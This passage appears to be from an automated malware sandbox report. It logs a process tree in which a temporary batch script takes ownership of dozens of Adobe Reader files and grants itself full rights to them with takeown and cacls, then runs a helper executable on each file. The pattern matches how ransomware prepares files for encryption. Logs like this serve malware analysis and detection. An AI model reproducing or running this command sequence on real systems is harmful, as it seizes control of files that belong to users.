- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C
    3⤵
    PID:1072
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"
    3⤵
    - Modifies file permissions
    PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "br.gif" -nobanner
    3⤵
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "br.gif" -nobanner
      4⤵
      PID:1516
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "form_responses.gif" -nobanner
    3⤵
    PID:1368
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "form_responses.gif" -nobanner
      4⤵
      PID:1100
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""
  2⤵
  PID:716
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "review_email.gif" -nobanner
    3⤵
    PID:1080
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "review_email.gif" -nobanner
      4⤵
      PID:1480
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""
  2⤵
  PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "tr.gif" -nobanner
    3⤵
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "tr.gif" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1576
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""
  2⤵
  PID:968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "AdobePiStd.otf" -nobanner
    3⤵
    PID:1368
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "AdobePiStd.otf" -nobanner
      4⤵
      PID:1168
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""
  2⤵
  PID:1500
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"
    3⤵
    - Modifies file permissions
    PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
    3⤵
    PID:1080
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
      4⤵
      PID:432
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""
  2⤵
  PID:1164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
    3⤵
    - Modifies file permissions
    PID:1968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
    3⤵
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
      4⤵
      PID:1888
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""
  2⤵
  PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"
    3⤵
    - Modifies file permissions
    PID:1168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "can.fca" -nobanner
    3⤵
    PID:1368
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "can.fca" -nobanner
      4⤵
      PID:1900
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""
  2⤵
  PID:1696
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"
    3⤵
    - Modifies file permissions
    PID:432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "usa03.ths" -nobanner
    3⤵
    PID:1080
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "usa03.ths" -nobanner
      4⤵
      PID:716
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1156
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""
  2⤵
  PID:1500
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "GREEK.TXT" -nobanner
    3⤵
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "GREEK.TXT" -nobanner
      4⤵
      PID:1720
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""
  2⤵
  PID:872
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"
    3⤵
    - Modifies file permissions
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "CP1253.TXT" -nobanner
    3⤵
    PID:268
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "CP1253.TXT" -nobanner
      4⤵
      PID:604
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1496
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""
  2⤵
  PID:584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"
    3⤵
    - Modifies file permissions
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "AGMGPUOptIn.ini" -nobanner
    3⤵
    PID:660
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "AGMGPUOptIn.ini" -nobanner
      4⤵
      PID:1744
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""
  2⤵
  PID:1072
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"
    3⤵
    - Modifies file permissions
    PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "MyriadCAD.otf" -nobanner
    3⤵
    PID:1940
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "MyriadCAD.otf" -nobanner
      4⤵
      PID:1944
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1484
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""
  2⤵
  PID:1664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"
    3⤵
    - Modifies file permissions
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "create_form.gif" -nobanner
    3⤵
    PID:2040
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "create_form.gif" -nobanner
      4⤵
      PID:968
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""
  2⤵
  PID:844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C
    3⤵
    PID:896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "info.gif" -nobanner
    3⤵
    PID:336
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "info.gif" -nobanner
      4⤵
      PID:1156
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""
  2⤵
  PID:744
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"
    3⤵
    - Modifies file permissions
    PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "review_same_reviewers.gif" -nobanner
    3⤵
    PID:1732
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "review_same_reviewers.gif" -nobanner
      4⤵
      PID:976
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "trash.gif" -nobanner
    3⤵
    PID:1368
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "trash.gif" -nobanner
      4⤵
      PID:1752
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""
  2⤵
  PID:604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:1064
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"
    3⤵
    - Modifies file permissions
    PID:1772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "CourierStd-Bold.otf" -nobanner
    3⤵
    PID:1148
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "CourierStd-Bold.otf" -nobanner
      4⤵
      PID:1588
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""
  2⤵
  PID:1156
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"
    3⤵
    PID:872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "MyriadPro-It.otf" -nobanner
    3⤵
    PID:1092
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "MyriadPro-It.otf" -nobanner
      4⤵
      PID:1164
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""
  2⤵
  PID:976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C
    3⤵
    PID:812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
    3⤵
    PID:1048
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
      4⤵
      PID:1072
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""
  2⤵
  PID:1752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "can.hyp" -nobanner
    3⤵
    PID:1496
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "can.hyp" -nobanner
      4⤵
      PID:1900
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1772
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C
    3⤵
    PID:752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"
    3⤵
    - Modifies file permissions
    PID:1100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "usa37.hyp" -nobanner
    3⤵
    PID:900
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "usa37.hyp" -nobanner
      4⤵
      PID:716
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""
  2⤵
  PID:1164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"
    3⤵
    - Modifies file permissions
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "ICELAND.TXT" -nobanner
    3⤵
    PID:1944
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "ICELAND.TXT" -nobanner
      4⤵
      PID:584
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1532
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""
  2⤵
  PID:1072
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"
    3⤵
    - Modifies file permissions
    PID:932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "CP1254.TXT" -nobanner
    3⤵
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "CP1254.TXT" -nobanner
      4⤵
      PID:1940
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1484
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C
    3⤵
    PID:804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"
    3⤵
    PID:268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "eula.ini" -nobanner
    3⤵
    PID:660
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "eula.ini" -nobanner
      4⤵
      PID:2040
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""
  2⤵
  PID:716
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"
    3⤵
    - Modifies file permissions
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "AcroSign.prc" -nobanner
    3⤵
    PID:1608
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "AcroSign.prc" -nobanner
      4⤵
      PID:1744
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""
  2⤵
  PID:584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\takeown.exe
